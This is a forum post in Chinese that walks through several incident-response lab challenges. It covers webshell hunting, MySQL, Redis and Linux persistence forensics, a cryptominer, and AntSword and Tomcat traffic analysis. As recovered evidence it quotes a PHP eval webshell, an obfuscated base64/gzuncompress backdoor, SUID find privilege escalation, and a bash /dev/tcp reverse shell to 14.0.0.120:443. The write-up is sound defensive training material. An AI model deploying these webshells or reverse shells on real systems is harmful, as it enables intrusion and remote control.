玄机应急响应平台部分wp
T0T 发表于 山东 CTF 7896浏览 · 2024-02-15 16:30

玄机应急响应平台wp

第一章 应急响应-webshell查杀

靶机账号密码 root xjwebshell
1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
4.黑客免杀马完整路径 md5 flag{md5}
黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}  --  火绒检测  /var/www/html/include/gz.php  
2.黑客使用的什么工具的shell github地址的md5 flag{md5} -- 搜索一下gz.php的木马语句,匹配哥斯拉木马  md5('https://github.com/BeichenDream/Godzilla')
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx  -- 火绒检测   md5('/var/www/html/include/Db/.Mysqli.php')
4.黑客免杀马完整路径 md5 flag{md5} -- 火绒检测   md5('/var/www/html/wap/top.php')

第一章 应急响应- Linux入侵排查

账号:root 密码:linuxruqin
ssh root@IP
1.web目录存在木马,请找到木马的密码提交
2.服务器疑似存在不死马,请找到不死马的密码提交
3.不死马是通过哪个文件生成的,请提交文件名
4.黑客留下了木马文件,请找出黑客的服务器ip提交
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交
1.web目录存在木马,请找到木马的密码提交 1.php
2.服务器疑似存在不死马,请找到不死马的密码提交  
3.不死马是通过哪个文件生成的,请提交文件名
4.黑客留下了木马文件,请找出黑客的服务器ip提交
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交

2.服务器疑似存在不死马,请找到不死马的密码提交

<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>

md5解一下是hello

3.不死马是通过哪个文件生成的,请提交文件名

接上面d盾扫出来的图

flag{index.php}

4.黑客留下了木马文件,请找出黑客的服务器ip提交
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交

www目录下存在shell.elf

chmod 777 shell.elf 
./shell.elf
netstat -antlp|more

第二章日志分析-mysql应急响应

mysql应急响应 ssh账号 root  密码 xjmysql
ssh env.xj.edisec.net  -p xxxxx
1.黑客第一次写入的shell flag{关键字符串} 
2.黑客反弹shell的ip flag{ip}
3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx
4.黑客获取的权限 flag{whoami后的值}
1.黑客第一次写入的shell flag{关键字符串}  sh.php
2.黑客反弹shell的ip flag{ip} 192.168.100.13 error,log
3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx 
4.黑客获取的权限 flag{whoami后的值}

1.黑客第一次写入的shell flag{关键字符串}

d盾扫出来

2.黑客反弹shell的ip flag{ip}

在error,log找到用户操作了1.sh

1.sh中写了反弹shell

3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx

猜测就udf提权

4.黑客获取的权限 flag{whoami后的值}

udf提权whoami返回的是mysql、

第二章日志分析-redis应急响应

ssh账号root 密码 xjredis
1,黑客攻击成功的ip flag{127.0.0.1}
2,黑客第一次上传的恶意文件  flag{xxxxxxxx}
3,黑客反弹shell的ip flag{ip}
4,黑客的用户名和溯源分析后的flag flag格式 flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx-flag
5,黑客篡改的命令 flag格式为:flag{一个md5字符串}

1,黑客攻击成功的ip flag{127.0.0.1}

root@ip-10-0-10-1:~# find / -name "redis.log"
/var/log/redis.log
192.168.100.13
192.168.100.20

192.168.100.13出现次数较多明显是爆破

192.168.100.20是主从复制

2,黑客第一次上传的恶意文件 flag{xxxxxxxx}

这里从exp.so加载了system模块exp.so无疑就上传的了

寻找exp.so(根目录

3,黑客反弹shell的ip flag{ip}

看一下定时任务

crontab -l

4,黑客的用户名和溯源分析后的flag flag格式 flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx-flag

看.ssh下的authorized_keys

xj-test-user

找一下该用户的github看一下历史版本tye · xj-test-user/redis-rogue-getshell@76b1b74 (github.com)

flag{xj-test-user-wow-you-find-flag}

5,黑客篡改的命令 flag格式为:flag{一个md5字符串}

cd /usr/bin
ls -al

cat ps

第三章 权限维持-linux权限维持-隐藏

ssh root@env.xj.edisec.net -p  密码  xjqxwcyc
1.黑客隐藏的隐藏的文件 完整路径md5
2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}
3.黑客提权所用的命令 完整路径的md5 flag{md5} 
4.黑客尝试注入恶意代码的工具完整路径md5
5.使用命令运行 ./x.xx 执行该文件  将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}

1.黑客隐藏的隐藏的文件 完整路径md5

应急响应之Linux下进程隐藏 - FreeBuf网络安全行业门户在/tmp/.temp/文件夹下发现libprocesshider

libprocesshider是用于隐藏文件的项目

/tmp/.temp/libprocesshider/processhider.c

隐藏了1.py

/tmp/.temp/libprocesshider/1.py

2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}

1.py

3.黑客提权所用的命令 完整路径的md5 flag{md5}

find / -perm -u=s -type f 2>/dev/null

自己尝试提权

发现可以find提权

/usr/bin/find

4.黑客尝试注入恶意代码的工具完整路径md5

我们不难发现这个靶机是和mysql的那个靶机是差不多一样的

发现opt的目录下多出来的东西

cymothoa是后门工具

/opt/.cymothoa-1-beta/cymothoa

5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec 值 作为flag提交 flag{/xxx/xxx/xxx}

root@xuanji:/opt/.cymothoa-1-beta# ls /usr/bin/python3 -al
lrwxrwxrwx. 1 root root 9 Mar 23  2014 /usr/bin/python3 -> python3.4
root@xuanji:/opt/.cymothoa-1-beta# which  python3.4
/usr/bin/python3.
/usr/bin/python3

第五章 linux实战-挖矿

应急响应工程师在内网服务器发现有台主机 cpu 占用过高,猜测可能是中了挖矿病毒,请溯源分析,提交对应的报告给应急小组
虚拟机账号密码 root websecyjxy web 端口为 8081
1、黑客的IP是? flag格式:flag{黑客的ip地址},如:flag{127.0.0.1}
2、黑客攻陷网站的具体时间是? flag格式:flag{年-月-日 时:分:秒},如:flag{2023-12-24 22:23:24}
3、黑客上传webshell的名称及密码是? flag格式:flag{黑客上传的webshell名称-webshell密码},如:flag{webshell.php-pass}
4、黑客提权后设置的后门文件名称是? flag格式:flag{后门文件绝对路径加上名称},如:flag{/etc/passwd}
5、对黑客上传的挖矿病毒进行分析,获取隐藏的Flag

1、黑客的IP是? flag格式:flag{黑客的ip地址},如:flag{127.0.0.1}

大致翻找一下发下网站时基于nginx的

看nginx的日志/www/admin/websec_80/log

192.168.10.135

2、黑客攻陷网站的具体时间是? flag格式:flag{年-月-日 时:分:秒},如:flag{2023-12-24 22:23:24}

访问网站发现时之梦,根据日志知道了之梦的后台登录网站/dede

用户名admin我们自己拿弱密码字典爆破一下(相当于自己打一遍靶机)

爆破出密码时12345678

登录后台发现攻击者自己创造的账户,他的登录时间也就可以理解成攻陷的时间

3、黑客上传webshell的名称及密码是? flag格式:flag{黑客上传的webshell名称-webshell密码},如:flag{webshell.php-pass}

d盾扫描网站的工作目录

\wwwroot\error\404.php存在后门

eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));

本地run一下

string(20) "eval($_POST['cmd']);"

4、黑客提权后设置的后门文件名称是? flag格式:flag{后门文件绝对路径加上名称},如:flag{/etc/passwd}

提权后就是root直接看root的历史执行命令

find被赋予了suid权限,攻击者可以利用suid提权做后门find文件被做了后门

5、对黑客上传的挖矿病毒进行分析,获取隐藏的Flag

找挖矿程序就要找计划任务但是crontab指令用不了

看/etc/crontab

下载了一个ldm估计就是挖矿程序了

[root@ip-10-0-10-1 ~]# find / -name "ldm"
/etc/.cache/ldm

在line 691发现一段python代码

"import base64;exec(base64.b64decode('aW1wb3J0IHRpbWUKd2hpbGUgMToKICAgIHByaW50KCJmbGFne3dlYnNlY19UcnVlQDg4OCF9IikKICAgIHRpbWUuc2xlZXAoMTAwMCk='))"

base64解一下

import time
while 1:
    print("flag{websec_True@888!}")
    time.sleep(1000)

第六章 流量特征分析-蚁剑流量分析

1.木马的连接密码是多少
2.黑客执行的第一个命令是什么
3.黑客读取了哪个文件的内容,提交文件绝对路径
4.黑客上传了什么文件到服务器,提交文件名
5.黑客上传的文件内容是什么
6.黑客下载了哪个文件,提交文件绝对路径

1.木马的连接密码是多少

2.黑客执行的第一个命令是什么

base64删除两位

3.黑客读取了哪个文件的内容,提交文件绝对路径

明显是/etc/passwd

4.黑客上传了什么文件到服务器,提交文件名

5.黑客上传的文件内容是什么

该流下面的16进制

6.黑客下载了哪个文件,提交文件绝对路径

第六章 流量特征分析-常见攻击事件 tomcat

1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP  flag格式:flag{ip},如:flag{127.0.0.1}
2、找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}
3、哪一个端口提供对web服务器管理面板的访问? flag格式:flag{2222}
4、经过前面对攻击者行为的分析后,攻击者运用的工具是? flag格式:flag{名称}
5、攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码? flag格式:flag{root-123}
6、攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称? flag格式:flag{114514.txt}
7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息? flag提示,某种任务里的信息

1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP flag格式:flag{ip},如:flag{127.0.0.1}

我们看到有许多的SYN包,很明显是nmap的扫描行为

2、找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}

14.0.0.120

ip反查出来时广州

3、哪一个端口提供对web服务器管理面板的访问? flag格式:flag{2222}

看http协议发现有个访问路径是/admin

4、经过前面对攻击者行为的分析后,攻击者运用的工具是? flag格式:flag{名称}

接上图的UA

gobuster

5、攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码? flag格式:flag{root-123}

没有认证或认证不成功会返回401,认证标识Authorization: Basic

http contains "Authorization: Basic"

一个一个包找,知道返回包是200的时候才是认证成功的

YWRtaW46dG9tY2F0
admin:tomcat

6、攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称? flag格式:flag{114514.txt}

上传就是POST设置过滤器

http.request.method==POST

就一个流,跟进去就可以看到

JXQOZY.war

7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息? flag提示,某种任务里的信息

/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'

传完

0 条评论
某人
表情
可输入 255